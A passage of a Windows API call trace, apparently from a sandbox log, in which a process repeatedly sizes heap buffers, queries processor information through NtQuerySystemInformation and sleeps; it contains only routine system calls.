ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.232] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0304.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0304.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0304.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0304.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0304.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0304.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0304.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.234] Sleep (dwMilliseconds=0x110) [0304.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0304.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0304.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0304.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0304.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0304.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0304.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0304.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0304.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.251] Sleep (dwMilliseconds=0x110) [0304.263] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0304.263] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.263] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0304.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0304.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0304.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0304.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0304.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0304.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0304.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.268] Sleep (dwMilliseconds=0x110) [0304.293] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0304.294] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0304.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0304.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0304.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0304.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0304.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0304.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0304.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.298] Sleep (dwMilliseconds=0x110) [0304.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0304.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0304.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0304.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0304.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0304.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0304.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0304.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0304.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.314] Sleep (dwMilliseconds=0x110) [0304.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0304.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0304.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0304.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0304.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0304.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0304.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0304.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0304.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.331] Sleep (dwMilliseconds=0x110) [0304.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0304.341] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0304.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0304.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0304.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0304.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0304.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0304.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0304.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.344] Sleep (dwMilliseconds=0x110) [0304.356] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0304.356] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.357] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0304.357] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0304.357] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.358] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0304.358] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0304.358] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0304.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0304.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0304.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.361] Sleep (dwMilliseconds=0x110) [0304.372] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0304.372] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.373] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0304.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0304.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.373] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0304.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0304.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0304.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0304.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0304.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.374] Sleep (dwMilliseconds=0x110) [0304.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0304.388] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0304.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0304.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0304.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0304.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0304.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0304.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0304.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.392] Sleep (dwMilliseconds=0x110) [0304.403] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0304.403] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.404] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0304.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0304.404] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0304.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0304.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0304.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0304.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0304.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.406] Sleep (dwMilliseconds=0x110) [0304.421] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0304.421] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.422] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0304.422] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0304.422] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.422] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0304.422] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0304.422] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.422] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0304.422] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0304.422] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.423] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0304.423] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.423] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.423] Sleep (dwMilliseconds=0x110) [0304.450] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0304.450] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.451] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0304.451] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0304.451] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.451] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0304.451] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0304.451] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.451] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0304.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0304.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0304.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.452] Sleep (dwMilliseconds=0x110) [0304.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0304.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.466] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0304.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0304.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0304.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0304.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0304.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0304.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0304.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.468] Sleep (dwMilliseconds=0x110) [0304.489] RtlAllocateHeap (HeapHandle=0x2560000, 